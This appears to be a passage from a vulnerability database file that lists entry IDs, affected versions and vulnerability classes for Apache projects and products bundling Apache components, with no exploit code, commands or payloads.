| [80165] Intel McAfee ePolicy Orchestrator up to 4.6.9/5.0.3/5.3.1 Apache Commons Collections Library privilege escalation
| [80116] Apache Subversion up to 1.9.2 svn Protocol libsvn_ra_svn/marshal.c read_string memory corruption
| [80115] Apache ActiveMQ up to 5.12.x Broker Service privilege escalation
| [80036] IBM Cognos Business Intelligence Apache Commons Collections Library InvokerTransformer privilege escalation
| [79873] VMware vCenter Operations/vRealize Orchestrator Apache Commons Collections Library Serialized Java Object privilege escalation
| [79840] Apache Cordova File Transfer Plugin up to 1.2.x on Android unknown vulnerability
| [79839] Apache TomEE Serialized Java Stream EjbObjectInputStream privilege escalation
| [79791] Cisco Products Apache Commons Collections Library privilege escalation
| [79539] Apple Mac OS X up to 10.11.1 apache_mod_php memory corruption
| [79538] Apple Mac OS X up to 10.11.1 apache_mod_php memory corruption
| [79294] Apache Cordova-Android up to 3.6 BridgeSecret Random Generator weak encryption
| [79291] Apache Cordova-Android up to 4.0 Javascript Whitelist privilege escalation
| [79244] Apache CXF up to 2.7.17/3.0.7/3.1.2 SAML Web SSO Module SAML Response weak authentication
| [79243] Oracle WebLogic Server 10.3.6.0/12.1.2.0/12.1.3.0/12.2.1.0 WLS Security com.bea.core.apache.commons.collections.jar privilege escalation
| [78989] Apache Ambari up to 2.1.1 Open Redirect
| [78988] Apache Ambari up to 2.0.1/2.1.0 Password privilege escalation
| [78987] Apache Ambari up to 2.0.x cross site scripting
| [78986] Apache Ambari up to 2.0.x Proxy Endpoint api/v1/proxy privilege escalation
| [78780] Apple Mac OS X up to 10.11.0 apache_mod_php denial of service
| [78779] Apple Mac OS X up to 10.11.0 apache_mod_php denial of service
| [78778] Apple Mac OS X up to 10.11.0 apache_mod_php memory corruption
| [78777] Apple Mac OS X up to 10.11.0 apache_mod_php memory corruption
| [78776] Apple Mac OS X up to 10.11.0 apache_mod_php memory corruption
| [78775] Apple Mac OS X up to 10.11.0 apache_mod_php memory corruption
| [78774] Apple Mac OS X up to 10.11.0 apache_mod_php memory corruption
| [78297] Apache Commons Components HttpClient up to 4.3.5 HTTPS Timeout denial of service
| [77406] Apache Flex BlazeDS AMF Message XML External Entity
| [77429] Apache ActiveMQ up to 5.10.0 LDAPLoginModule privilege escalation
| [77399] Apache ActiveMQ up to 5.10.0 LDAPLoginModule weak authentication
| [77375] Apache Tapestry up to 5.3.5 Client-Side Object Storage privilege escalation
| [77331] Apache ActiveMQ up to 5.11.1 on Windows Fileserver Upload/Download directory traversal
| [77299] Apache Solr Real-Time Module up to 7.x-1.1 Index Content information disclosure
| [77247] Apache ActiveMQ up to 5.10 TransportConnection.java processControlCommand denial of service
| [77083] Apache Groovy up to 2.4.3 MethodClosure.java MethodClosure memory corruption
| [76953] Apache Subversion 1.7.0/1.8.0/1.8.10 svn_repos_trace_node_locations information disclosure
| [76952] Apache Subversion 1.7.0/1.8.0/1.8.10 mod_authz_svn anonymous/authenticated information disclosure
| [76567] Apache Struts 2.3.20 unknown vulnerability
| [76733] Apache HTTP Server 2.4.7/2.4.8/2.4.9/2.4.10/2.4.12 ap_some_auth_required unknown vulnerability
| [76732] Apache HTTP Server 2.4.7/2.4.8/2.4.9/2.4.10/2.4.12 Request apr_brigade_flatten privilege escalation
| [76731] Apache HTTP Server 2.4.12 ErrorDocument 400 Crash denial of service
| [75690] Apache Camel up to 2.13.3/2.14.1 XPathBuilder.java XML External Entity
| [75689] Apache Camel up to 2.13.3/2.14.1 XML Converter Setup XmlConverter.java SAXSource privilege escalation
| [75668] Apache Sling API/Sling Servlets Post up to 2.2.1 HtmlResponse cross site scripting
| [75601] Apache Jackrabbit up to 2.10.0 WebDAV Request XML External Entity
| [75420] Apache Tomcat up to 6.0.43/7.0.58/8.0.16 Security Manager privilege escalation
| [75145] Apache OpenOffice up to 4.1.1 HWP Filter Crash denial of service
| [75032] Apache Tomcat Connectors up to 1.2.40 mod_jk privilege escalation
| [75135] PHP 5.4/5.5 HTTP Request sapi_apache2.c apache2handler privilege escalation
| [74793] Apache Tomcat File Upload denial of service
| [74708] Apple MacOS X up to 10.10.2 Apache denial of service
| [74707] Apple MacOS X up to 10.10.2 Apache denial of service
| [74706] Apple MacOS X up to 10.10.2 Apache memory corruption
| [74705] Apple MacOS X up to 10.10.2 Apache denial of service
| [74704] Apple MacOS X up to 10.10.2 Apache denial of service
| [74703] Apple MacOS X up to 10.10.2 Apache denial of service
| [74702] Apple MacOS X up to 10.10.2 Apache denial of service
| [74701] Apple MacOS X up to 10.10.2 Apache cross site request forgery
| [74700] Apple MacOS X up to 10.10.2 Apache unknown vulnerability
| [74661] Apache Flex up to 4.14.0 asdoc index.html cross site scripting
| [74609] Apache Cassandra up to 1.2.19/2.0.13/2.1.3 JMX/RMI Interface privilege escalation
| [74469] Apache Xerces-C up to 7.0 internal/XMLReader.cpp denial of service
| [74468] Apache Batik up to 1.6 denial of service
| [74414] Apache Mod-gnutls up to 0.5.1 Authentication spoofing
| [74371] Apache Standard Taglibs up to 1.2.0 memory corruption
| [74367] Apache HTTP Server up to 2.4.12 mod_lua lua_request.c wsupgrade denial of service
| [74174] Apache WSS4J up to 2.0.0 privilege escalation
| [74172] Apache ActiveMQ up to 5.5.0 Administration Console cross site scripting
| [69092] Apache Tomcat up to 6.0.42/7.0.54/8.0.8 HTTP Request Smuggling privilege escalation
| [73831] Apache Qpid up to 0.30 Access Restriction unknown vulnerability
| [73731] Apache XML Security unknown vulnerability
| [68660] Oracle BI Publisher 10.1.3.4.2/11.1.1.7 Apache Tomcat cross site scripting
| [73659] Apache CloudStack up to 4.3.0 Stack-Based unknown vulnerability
| [73593] Apache Traffic Server up to 5.1.0 denial of service
| [73511] Apache POI up to 3.10 Deadlock denial of service
| [73510] Apache Solr up to 4.3.0 cross site scripting
| [68447] Apache Subversion up to 1.7.18/1.8.10 mod_dav_svn Crash denial of service
| [68446] Apache Subversion up to 1.7.18/1.8.10 REPORT Request Crash denial of service
| [73173] Apache CloudStack Stack-Based unknown vulnerability
| [68357] Apache Struts up to 2.3.16.3 Random Number Generator cross site request forgery
| [73106] Apache Hadoop up to 2.4.0 Symlink privilege escalation
| [68575] Apache HTTP Server up to 2.4.10 LuaAuthzProvider mod_lua.c privilege escalation
| [72890] Apache Qpid 0.30 unknown vulnerability
| [72887] Apache Hive 0.13.0 File Permission privilege escalation
| [72878] Apache Cordova 3.5.0 cross site request forgery
| [72877] Apache Cordova 3.5.0 cross site request forgery
| [72876] Apache Cordova 3.5.0 cross site request forgery
| [68435] Apache HTTP Server 2.4.10 mod_proxy_fcgi.c handle_headers denial of service
| [68065] Apache CXF up to 3.0.1 JAX-RS SAML denial of service
| [68064] Apache CXF up to 3.0.0 SAML Token denial of service
| [67913] Oracle Retail Markdown Optimization 12.0/13.0/13.1/13.2/13.4 Apache commons-beanutils-1.8.0.jar memory corruption
| [67912] Oracle Retail Invoice Matching up to 14.0 Apache commons-beanutils-1.8.0.jar memory corruption
| [67911] Oracle Retail Clearance Optimization Engine 13.3/13.4/14.0 Apache commons-beanutils-1.8.0.jar memory corruption
| [67910] Oracle Retail Allocation up to 13.2 Apache commons-beanutils-1.8.0.jar memory corruption
| [71835] Apache Shiro 1.0.0/1.1.0/1.2.0/1.2.1/1.2.2 unknown vulnerability
| [71633] Apachefriends XAMPP 1.8.1 cross site scripting
| [71629] Apache Axis2/C spoofing
| [67633] Apple Mac OS X up to 10.9.4 apache_mod_php ext/standard/dns.c dns_get_record memory corruption
| [67631] Apple Mac OS X up to 10.9.4 apache_mod_php Symlink memory corruption
| [67630] Apple Mac OS X up to 10.9.4 apache_mod_php cdf_read_property_info denial of service
| [67629] Apple Mac OS X up to 10.9.4 apache_mod_php cdf.c cdf_count_chain denial of service
| [67628] Apple Mac OS X up to 10.9.4 apache_mod_php cdf.c cdf_check_stream_offset denial of service
| [67627] Apple Mac OS X up to 10.9.4 apache_mod_php softmagic.c mconvert memory corruption
| [67626] Apple Mac OS X up to 10.9.4 apache_mod_php softmagic.c denial of service
| [67625] Apple Mac OS X up to 10.9.4 apache_mod_php Crash denial of service
| [67624] Apple Mac OS X up to 10.9.4 apache_mod_php cdf.c cdf_read_property_info denial of service
| [67623] Apple Mac OS X up to 10.9.4 apache_mod_php cdf.c cdf_unpack_summary_info denial of service
| [67622] Apple Mac OS X up to 10.9.4 apache_mod_php cdf.c cdf_read_short_sector denial of service
| [67620] Apple Mac OS X up to 10.9.4 apache_mod_php magic/Magdir/commands denial of service
| [67790] Apache HTTP Server mod_cache NULL Pointer Dereference denial of service
| [67522] Apache Tomcat up to 7.0.39 JSP Upload privilege escalation
| [70809] Apache POI up to 3.11 Crash denial of service
| [70808] Apache POI up to 3.10 unknown vulnerability
| [70806] Apache Commons-httpclient 4.2/4.2.1/4.2.2 spoofing
| [70749] Apache Axis up to 1.4 getCN spoofing
| [70701] Apache Traffic Server up to 3.3.5 denial of service
| [70700] Apache OFBiz up to 12.04.03 cross site scripting
| [67402] Apache OpenOffice 4.0.0/4.0.1/4.1.0 Calc privilege escalation
| [67401] Apache OpenOffice up to 4.1.0 OLE Object information disclosure
| [70661] Apache Subversion up to 1.6.17 denial of service
| [70660] Apache Subversion up to 1.6.17 spoofing
| [70659] Apache Subversion up to 1.6.17 spoofing
| [67183] Apache HTTP Server up to 2.4.9 mod_proxy denial of service
| [67180] Apache HTTP Server up to 2.4.9 WinNT MPM Memory Leak denial of service
| [67185] Apache HTTP Server up to 2.4.9 mod_status Heap-Based memory corruption
| [67184] Apache HTTP Server 2.4.5/2.4.6 mod_cache NULL Pointer Dereference denial of service
| [67182] Apache HTTP Server up to 2.4.9 mod_deflate Memory Consumption denial of service
| [67181] Apache HTTP Server up to 2.4.9 mod_cgid denial of service
| [70338] Apache Syncope up to 1.1.7 unknown vulnerability
| [70295] Apache CXF up to 2.7.9 Cleartext information disclosure
| [70106] Apache Open For Business Project up to 10.04.0 getServerError cross site scripting
| [70105] Apache MyFaces up to 2.1.5 JavaServer Faces directory traversal
| [69846] Apache HBase up to 0.94.8 information disclosure
| [69783] Apache CouchDB up to 1.2.0 memory corruption
| [13383] Apache Tomcat up to 6.0.39/7.0.53/8.0.5 XML Parser privilege escalation
| [13300] Apache HTTP Server 2.4.1/2.4.2 mod_wsgi setuid privilege escalation
| [13299] Apache HTTP Server 2.4.1/2.4.2 mod_wsgi Content-Type Header information disclosure
| [13164] Apache CXF up to 2.6.13/2.7.10 SOAP OutgoingChainInterceptor.java Invalid Content denial of service
| [13163] Apache CXF up to 2.6.13/2.7.10 SOAP HTML Content denial of service
| [13158] Apache Struts up to 2.3.16.2 ParametersInterceptor getClass privilege escalation
| [69515] Apache Struts up to 2.3.15.0 CookieInterceptor memory corruption
| [13086] Apache Struts up to 1.3.10 Class Loader privilege escalation
| [13067] Apache Struts up to 2.3.16.1 Class Loader privilege escalation
| [69431] Apache Archiva up to 1.3.6 cross site scripting
| [69385] Apache Syncope up to 1.1.6 unknown vulnerability
| [69338] Apache Xalan-Java up to 2.7.1 system-property unknown vulnerability
| [12742] Trustwave ModSecurity up to 2.7.5 Chunk Extension apache2/modsecurity.c modsecurity_tx_init privilege escalation
| [12741] Trustwave ModSecurity up to 2.7.6 Chunked HTTP Transfer apache2/modsecurity.c modsecurity_tx_init Trailing Header privilege escalation
| [13387] Apache Tomcat up to 6.0.39/7.0.53/8.0.5 Content-Length Header privilege escalation
| [13386] Apache Tomcat Security Manager up to 6.0.39/7.0.53/8.0.5 XSLT privilege escalation
| [13385] Apache Tomcat 8.0.0/8.0.1/8.0.3 AJP Request Zero Length denial of service
| [13384] Apache Tomcat up to 6.0.39/7.0.53/8.0.5 Chunked HTTP Request denial of service
| [12748] Apache CouchDB 1.5.0 UUIDS /_uuids denial of service
| [66739] Apache Camel up to 2.12.2 unknown vulnerability
| [66738] Apache Camel up to 2.12.2 unknown vulnerability
| [12667] Apache HTTP Server 2.4.7 mod_log_config.c log_cookie denial of service
| [66695] Apache CouchDB up to 1.2.0 cross site scripting
| [66694] Apache CouchDB up to 1.2.0 Partition partition2 directory traversal
| [66689] Apache HTTP Server up to 2.0.33 mod_dav dav_xml_get_cdata denial of service
| [12518] Apache Tomcat up to 6.0.38/7.0.49/8.0.0-RC9 HTTP Header denial of service
| [66498] Apache expressions up to 3.3.0 Whitelist unknown vulnerability
| [12781] Apache Struts up to 2.3.8 ParametersInterceptor getClass denial of service
| [12439] Apache Tomcat 6.0.33 XML XXE information disclosure
| [12438] Apache Tomcat 6.0.33/6.0.34/6.0.35/6.0.36/6.0.37 coyoteadapter.java disableURLRewriting privilege escalation
| [66356] Apache Wicket up to 6.8.0 information disclosure
| [12209] Apache Tomcat 7.0.0/7.0.50/8.0.0-RC1/8.0.1 Content-Type Header for Multi-Part Request Infinite Loop denial of service
| [66322] Apache ActiveMQ up to 5.8.0 cross site scripting
| [12291] Apache Struts up to 2.2.3 DebuggingInterceptor privilege escalation
| [66255] Apache Open For Business Project up to 10.04.3 cross site scripting
| [66200] Apache Hadoop up to 2.0.5 Security Feature information disclosure
| [66072] Apache CloudStack up to 4.2.0 Stack-Based unknown vulnerability
| [66068] Apache CloudStack up to 4.2.0 Stack-Based unknown vulnerability
| [11928] Oracle Secure Global Desktop up to 4.71 Apache Tomcat unknown vulnerability
| [11924] Oracle Secure Global Desktop up to 4.63 Apache Tomcat denial of service
| [11922] Oracle Secure Global Desktop up to 4.63 Apache Tomcat unknown vulnerability
| [66049] Apache XML Security for Java up to 1.4.6 Memory Consumption denial of service
| [12199] Apache Subversion up to 1.8.5 mod_dav_svn/repos.c get_resource denial of service
| [65946] askapache Firefox Adsense up to 3.0 askapache-firefox-adsense.php cross site request forgery
| [65668] Apache Solr 4.0.0 Updater denial of service
| [65665] Apache Solr up to 4.3.0 denial of service
| [65664] Apache Solr 3.6.0/3.6.1/3.6.2/4.0.0 Updater denial of service
| [65663] Apache Solr up to 4.5.1 ResourceLoader directory traversal
| [65658] Apache roller 4.0/4.0.1/5.0/5.0.1 unknown vulnerability
| [65657] Apache Roller 4.0/4.0.1/5.0/5.0.1 cross site scripting
| [11325] Apache Subversion 1.7.13 mod_dontdothat Bypass denial of service
| [11324] Apache Subversion up to 1.8.4 mod_dav_svn denial of service
| [11098] Apache Tomcat 5.5.25 HTTP Request cross site request forgery
| [65410] Apache Struts 2.3.15.3 cross site scripting
| [65386] Apache Solr up to 2.2.1 on TYPO3 cross site scripting
| [65385] Apache Solr up to 2.2.1 on TYPO3 unknown vulnerability
| [11044] Apache Struts 2.3.15.3 showConfig.action cross site scripting
| [11043] Apache Struts 2.3.15.3 actionNames.action cross site scripting
| [11018] cPanel WHM up to 11.40.0.11 Apache mod_userdir Tweak Interface privilege escalation
| [65342] Apache Sling 1.0.2/1.0.4/1.0.6/1.1.0/1.1.2 Auth Core cross site scripting
| [65340] Apache Shindig 2.5.0 information disclosure
| [65316] Apache Mod Fcgid up to 2.3.7 mod_fcgid fcgid_bucket.c fcgid_header_bucket_read memory corruption
| [65313] Apache Sling 2.2.0/2.3.0 AbstractCreateOperation.java deepGetOrCreateNode denial of service
| [10826] Apache Struts 2 File privilege escalation
| [65204] Apache Camel up to 2.10.1 unknown vulnerability
| [10460] Apache Struts 2.0.0/2.3.15.1 Action Mapping Mechanism Bypass privilege escalation
| [10459] Apache Struts 2.0.0/2.3.15 Dynamic Method Invocation unknown vulnerability
| [10160] Apache Subversion 1.8.0/1.8.1/1.8.2 svnwcsub.py handle_options race condition
| [10159] Apache Subversion up to 1.8.2 svnserve write_pid_file race condition
| [10158] Apache Subversion 1.8.0/1.8.1/1.8.2 daemonize.py daemon::daemonize race condition
| [10157] Apache Subversion up to 1.8.1 FSFS Repository Symlink privilege escalation
| [64808] Fail2ban up to 0.8.9 apache-auth.conf denial of service
| [64760] Best Practical RT up to 4.0.12 Apache::Session::File information disclosure
| [64722] Apache XML Security for C++ Heap-based memory corruption
| [64719] Apache XML Security for C++ Heap-based memory corruption
| [64718] Apache XML Security for C++ verify denial of service
| [64717] Apache XML Security for C++ getURIBaseTXFM memory corruption
| [64716] Apache XML Security for C++ spoofing
| [64701] Apache CXF up to 2.7.3 XML Parser Memory Consumption denial of service
| [64700] Apache CloudStack up to 4.1.0 Stack-Based cross site scripting
| [64667] Apache Open For Business Project up to 10.04.04 unknown vulnerability
| [64666] Apache Open For Business Project up to 10.04.04 cross site scripting
| [9891] Apache HTTP Server 2.2.22 suEXEC Feature .htaccess information disclosure
| [64509] Apache ActiveMQ up to 5.8.0 scheduled.jsp cross site scripting
| [9826] Apache Subversion up to 1.8.0 mod_dav_svn denial of service
| [9683] Apache HTTP Server 2.4.5 mod_session_dbd denial of service
| [64485] Apache Struts up to 2.2.3.0 privilege escalation
| [9568] Apache Struts up to 2.3.15 DefaultActionMapper cross site request forgery
| [9567] Apache Struts up to 2.3.15 DefaultActionMapper memory corruption
| [64467] Apache Geronimo 3.0 memory corruption
| [64466] Apache OpenJPA up to 2.2.1 Serialization memory corruption
| [64457] Apache Struts up to 2.2.3.0 cross site scripting
| [64326] Alejandro Garza Apachesolr Autocomplete up to 7.x-1.1 cross site scripting
| [9184] Apache Qpid up to 0.20 SSL misconfiguration
| [8935] Apache Subversion up to 1.7.9 FSFS Format Repository denial of service
| [8934] Apache Subversion up to 1.7.9 Svnserve Server denial of service
| [8933] Apache Subversion up to 1.6.21 check-mime-type.pl svnlook memory corruption
| [8932] Apache Subversion up to 1.6.21 svn-keyword-check.pl svnlook changed memory corruption
| [9022] Apache Struts up to 2.3.14.2 OGNL Expression memory corruption
| [8873] Apache Struts 2.3.14 privilege escalation
| [8872] Apache Struts 2.3.14 privilege escalation
| [8746] Apache HTTP Server Log File Terminal Escape Sequence Filtering mod_rewrite.c do_rewritelog privilege escalation
| [8666] Apache Tomcat up to 7.0.32 AsyncListener information disclosure
| [8665] Apache Tomcat up to 7.0.29 Chunked Transfer Encoding Extension Size denial of service
| [8664] Apache Tomcat up to 7.0.32 FORM Authentication weak authentication
| [64075] Apache Subversion up to 1.7.7 mod_dav_svn Crash denial of service
| [64074] Apache Subversion up to 1.7.8 mod_dav_svn NULL Pointer Dereference denial of service
| [64073] Apache Subversion up to 1.7.8 mod_dav_svn NULL Pointer Dereference denial of service
| [64072] Apache Subversion up to 1.7.7 mod_dav_svn NULL Pointer Dereference denial of service
| [64071] Apache Subversion up to 1.7.8 mod_dav_svn Memory Consumption denial of service
| [8768] Apache Struts up to 2.3.14 on Mac EL and OGNL Interpreter memory corruption
| [64006] Apache ActiveMQ up to 5.7.0 denial of service
| [64005] Apache ActiveMQ up to 5.7.0 Default Configuration denial of service
| [64004] Apache ActiveMQ up to 5.7.0 PortfolioPublishServlet.java cross site scripting
| [8427] Apache Tomcat Session Transaction weak authentication
| [63960] Apache Maven 3.0.4 Default Configuration spoofing
| [63751] Apache qpid up to 0.20 qpid::framing::Buffer denial of service
| [63750] Apache qpid up to 0.20 checkAvailable denial of service
| [63749] Apache Qpid up to 0.20 Memory Consumption denial of service
| [63748] Apache Qpid up to 0.20 Default Configuration denial of service
| [63747] Apache Rave up to 0.20 User Account information disclosure
| [7889] Apache Subversion up to 1.6.17 mod_dav_svn/svn_fs_file_length() denial of service
| [63646] Apache HTTP Server up to 2.2.23/2.4.3 mod_proxy_balancer.c balancer_handler cross site scripting
| [7688] Apache CXF up to 2.7.1 WSS4JInterceptor Bypass weak authentication
| [7687] Apache CXF up to 2.7.2 Token weak authentication
| [63334] Apache CXF up to 2.6.0 WS-Security unknown vulnerability
| [63299] Apache CXF up to 2.6.0 WS-Security unknown vulnerability
| [7202] Apache HTTP Server 2.4.2 on Oracle Solaris ld_library_path cross site scripting
| [7075] Apache Tomcat up to 6.0.35/7.0.27 NIO Connector NioEndpoint.java denial of service
| [7074] Apache Tomcat up to 6.0.35/7.0.29 FORM Authentication RealmBase.java weak authentication
| [7073] Apache Tomcat up to 6.0.35/7.0.31 CSRF Prevention Filter cross site request forgery
| [63090] Apache Tomcat up to 4.1.24 denial of service
| [63089] Apache HTTP Server up to 2.2.13 mod_proxy_ajp denial of service
| [62933] Apache Tomcat up to 5.5.0 Access Restriction unknown vulnerability
| [62929] Apache Tomcat up to 6.0.35/7.0.27 NIO Connector Memory Consumption denial of service
| [62833] Apache CXF -/2.6.0 spoofing
| [62832] Apache Axis2 up to 1.6.2 spoofing
| [62831] Apache Axis up to 1.4 Java Message Service spoofing
| [62830] Apache Commons-httpclient 3.0 Payments spoofing
| [62826] Apache Libcloud up to 0.11.0 spoofing
| [62757] Apache Open For Business Project up to 10.04.0 unknown vulnerability
| [8830] Red Hat JBoss Enterprise Application Platform 6.0.1 org.apache.catalina.connector.Response.encodeURL information disclosure
| [62661] Apache Axis2 unknown vulnerability
| [62658] Apache Axis2 unknown vulnerability
| [62467] Apache Qpid up to 0.17 denial of service
| [62417] Apache CXF 2.4.7/2.4.8/2.5.3/2.5.4/2.6.1 spoofing
| [6301] Apache HTTP Server mod_pagespeed cross site scripting
| [6300] Apache HTTP Server mod_pagespeed Hostname information disclosure
| [6123] Apache Wicket up to 1.5.7 Ajax Link cross site scripting
| [62035] Apache Struts up to 2.3.4 denial of service
| [61916] Apache QPID 0.5/0.6/0.14/0.16 unknown vulnerability
| [6998] Apache Tomcat 5.5.35/6.0.35/7.0.28 DIGEST Authentication Session State Caching privilege escalation
| [6997] Apache Tomcat 5.5.35/6.0.35/7.0.28 HTTP Digest Authentication Implementation privilege escalation
| [6092] Apache HTTP Server 2.4.0/2.4.1/2.4.2 mod_proxy_ajp.c information disclosure
| [6090] Apache HTTP Server 2.4.0/2.4.1/2.4.2 mod_proxy_http.c information disclosure
| [61507] Apache POI up to 3.8 UnhandledDataStructure denial of service
| [6070] Apache Struts up to 2.3.4 Token Name Configuration Parameter privilege escalation
| [6069] Apache Struts up to 2.3.4 Request Parameter OGNL Expression denial of service
| [5764] Oracle Solaris 10 Apache HTTP Server information disclosure
| [5700] Oracle Secure Backup 10.3.0.3/10.4.0.1 Apache denial of service
| [61255] Apache Hadoop 2.0.0 Kerberos unknown vulnerability
| [61229] Apache Sling up to 2.1.1 denial of service
| [61152] Apache Commons-compress 1.0/1.1/1.2/1.3/1.4 denial of service
| [61094] Apache Roller up to 5.0 cross site scripting
| [61093] Apache Roller up to 5.0 cross site request forgery
| [61005] Apache OpenOffice 3.3/3.4 unknown vulnerability
| [9673] Apache HTTP Server up to 2.4.4 mod_dav mod_dav.c Request denial of service
| [5436] Apache OpenOffice 3.3/3.4 WPXContentListener.cpp _closeTableRow File memory corruption
| [5435] Apache OpenOffice 3.3/3.4 vclmi.dll File memory corruption
4926| [60730] PHP 5.4.0/5.4.1/5.4.2 apache_request_headers memory corruption
4927| [60708] Apache Qpid 0.12 unknown vulnerability
4928| [5032] Apache Hadoop up to 0.20.205.0/1.0.1/0.23.1 Kerberos/MapReduce Security Feature privilege escalation
4929| [4949] Apache Struts File Upload XSLTResult.java XSLT File privilege escalation
4930| [4955] Apache Traffic Server 3.0.3/3.1.2 HTTP Header Parser memory corruption
4931| [4882] Apache Wicket up to 1.5.4 directory traversal
4932| [4881] Apache Wicket up to 1.4.19 cross site scripting
4933| [4884] Apache HTTP Server up to 2.3.6 mod_fcgid fcgid_spawn_ctl.c FcgidMaxProcessesPerClass HTTP Requests denial of service
4934| [60352] Apache Struts up to 2.2.3 memory corruption
4935| [60153] Apache Portable Runtime up to 1.4.3 denial of service
4936| [4598] Apache Struts 1.3.10 upload-submit.do cross site scripting
4937| [4597] Apache Struts 1.3.10 processSimple.do cross site scripting
4938| [4596] Apache Struts 2.0.14/2.2.3 struts2-rest-showcase/orders cross site scripting
4939| [4595] Apache Struts 2.0.14/2.2.3 struts2-showcase/person/editPerson.action cross site scripting
4940| [4583] Apache HTTP Server up to 2.2.21 Threaded MPM denial of service
4941| [4582] Apache HTTP Server up to 2.2.21 protocol.c information disclosure
4942| [4571] Apache Struts up to 2.3.1.2 privilege escalation
4943| [4557] Apache Tomcat up to 7.0.21 Caching/Recycling information disclosure
4944| [59934] Apache Tomcat up to 6.0.9 DigestAuthenticator.java unknown vulnerability
4945| [59933] Apache Tomcat up to 6.0.9 Access Restriction unknown vulnerability
4946| [59932] Apache Tomcat up to 6.0.9 unknown vulnerability
4947| [59931] Apache Tomcat up to 6.0.9 Access Restriction information disclosure
4948| [59902] Apache Struts up to 2.2.3 Interfaces unknown vulnerability
4949| [4528] Apache Struts up to 2.2.3 DebuggingInterceptor privilege escalation
4950| [4527] Apache Struts up to 2.2.3 ExceptionDelegator cross site scripting
4951| [59888] Apache Tomcat up to 6.0.6 denial of service
4952| [59886] Apache ActiveMQ up to 5.5.1 Crash denial of service
4953| [4513] Apache Struts up to 2.3.1 ParameterInterceptor directory traversal
4954| [4512] Apache Struts up to 2.2.3 CookieInterceptor privilege escalation
4955| [59850] Apache Geronimo up to 2.2.1 denial of service
4956| [59825] Apache HTTP Server up to 2.1.7 mod_reqtimeout denial of service
4957| [59556] Apache HTTP Server up to 2.0.53 mod_proxy information disclosure
4958| [58467] Apache libcloud 0.2.0/0.3.0/0.3.1/0.4.0 Access Restriction spoofing
4959| [58413] Apache Tomcat up to 6.0.10 spoofing
4960| [58381] Apache Wicket up to 1.4.17 cross site scripting
4961| [58296] Apache Tomcat up to 7.0.19 unknown vulnerability
4962| [57888] Apache HttpClient 4.0/4.0.1/4.1 Authorization information disclosure
4963| [57587] Apache Subversion up to 1.6.16 mod_dav_svn information disclosure
4964| [57585] Apache Subversion up to 1.6.16 mod_dav_svn Memory Consumption denial of service
4965| [57584] Apache Subversion up to 1.6.4 mod_dav_svn NULL Pointer Dereference denial of service
4966| [57577] Apache Rampart-C 1.3.0 Access Restriction rampart_timestamp_token_validate privilege escalation
4967| [57568] Apache Archiva up to 1.3.4 cross site scripting
4968| [57567] Apache Archiva up to 1.3.4 cross site request forgery
4969| [57481] Apache Tomcat 7.0.12/7.0.13 Access Restriction unknown vulnerability
4970| [4355] Apache HTTP Server APR apr_fnmatch denial of service
4971| [57435] Apache Struts up to 2.2.1.1 FileHandler.java cross site scripting
4972| [57425] Apache Struts up to 2.2.1.1 cross site scripting
4973| [4352] Apache HTTP Server 2.2.x APR apr_fnmatch denial of service
4974| [57025] Apache Tomcat up to 7.0.11 information disclosure
4975| [57024] Apache Tomcat 7.0.11 Access Restriction information disclosure
4976| [56774] IBM WebSphere Application Server up to 7.0.0.14 org.apache.jasper.runtime.JspWriterImpl.response denial of service
4977| [56824] Apache Subversion up to 1.6.4 mod_dav_svn NULL Pointer Dereference denial of service
4978| [56832] Apache Tomcat up to 7.0.10 Access Restriction information disclosure
4979| [56830] Apache Tomcat up to 7.0.9 Access Restriction privilege escalation
4980| [12440] Apache Tomcat 6.0.33 Malicious Request cross site scripting
4981| [56512] Apache Continuum up to 1.4.0 cross site scripting
4982| [4285] Apache Tomcat 5.x JVM getLocale denial of service
4983| [4284] Apache Tomcat 5.x HTML Manager Infinite Loop cross site scripting
4984| [4283] Apache Tomcat 5.x ServletContect privilege escalation
4985| [56441] Apache Tomcat up to 7.0.6 denial of service
4986| [56300] Apache CouchDB up to 1.0.1 Web Administration Interface cross site scripting
4987| [55967] Apache Subversion up to 1.6.4 rev_hunt.c denial of service
4988| [55966] Apache Subversion up to 1.6.4 mod_dav_svn repos.c walk denial of service
4989| [55095] Apache Axis2 up to 1.6 Default Password memory corruption
4990| [55631] Apache Archiva up to 1.3.1 User Account cross site request forgery
4991| [55556] Apache Tomcat up to 6.0.29 Default Configuration information disclosure
4992| [55553] Apache Tomcat up to 7.0.4 sessionsList.jsp cross site scripting
4993| [55162] Apache MyFaces up to 2.0.0 Authentication Code unknown vulnerability
4994| [54881] Apache Subversion up to 1.6.12 mod_dav_svn authz.c privilege escalation
4995| [54879] Apache APR-util up to 0.9.14 mod_reqtimeout apr_brigade_split_line denial of service
4996| [54693] Apache Traffic Server DNS Cache unknown vulnerability
4997| [54416] Apache CouchDB up to 0.11.0 cross site request forgery
4998| [54394] Apache CXF up to 2.2.8 Memory Consumption denial of service
4999| [54261] Apache Tomcat jsp/cal/cal2.jsp cross site scripting
5000| [54166] Apache HTTP Server up to 2.2.12 mod_cache Crash denial of service
5001| [54385] Apache Struts up to 2.1.8.1 ParameterInterceptor unknown vulnerability
5002| [54012] Apache Tomcat up to 6.0.10 denial of service
5003| [53763] Apache Axis2 1.3/1.4/1.4.1/1.5/1.5.1 Memory Consumption denial of service
5004| [53368] Apache MyFaces 1.1.7/1.2.8 cross site scripting
5005| [53397] Apache axis2 1.4.1/1.5.1 Administration Console cross site scripting
5006| [52894] Apache Tomcat up to 6.0.7 information disclosure
5007| [52960] Apache ActiveMQ up to 5.4-snapshot information disclosure
5008| [52843] Apache HTTP Server mod_auth_shadow unknown vulnerability
5009| [52786] Apache Open For Business Project up to 09.04 cross site scripting
5010| [52587] Apache ActiveMQ up to 5.3.0 cross site request forgery
5011| [52586] Apache ActiveMQ up to 5.3.0 cross site scripting
5012| [52584] Apache CouchDB up to 0.10.1 information disclosure
5013| [51757] Apache HTTP Server 2.0.44 cross site scripting
5014| [51756] Apache HTTP Server 2.0.44 spoofing
5015| [51717] Apache HTTP Server up to 1.3.3 mod_proxy ap_proxy_send_fb memory corruption
5016| [51690] Apache Tomcat up to 6.0 directory traversal
5017| [51689] Apache Tomcat up to 6.0 information disclosure
5018| [51688] Apache Tomcat up to 6.0 directory traversal
5019| [50886] HP Operations Manager 8.10 on Windows File Upload org.apache.catalina.manager.HTMLManagerServlet memory corruption
5020| [50802] Apache Tomcat up to 3.3 Default Password weak authentication
5021| [50626] Apache Solr 1.0.0 cross site scripting
5022| [49857] Apache HTTP Server mod_proxy_ftp cross site scripting
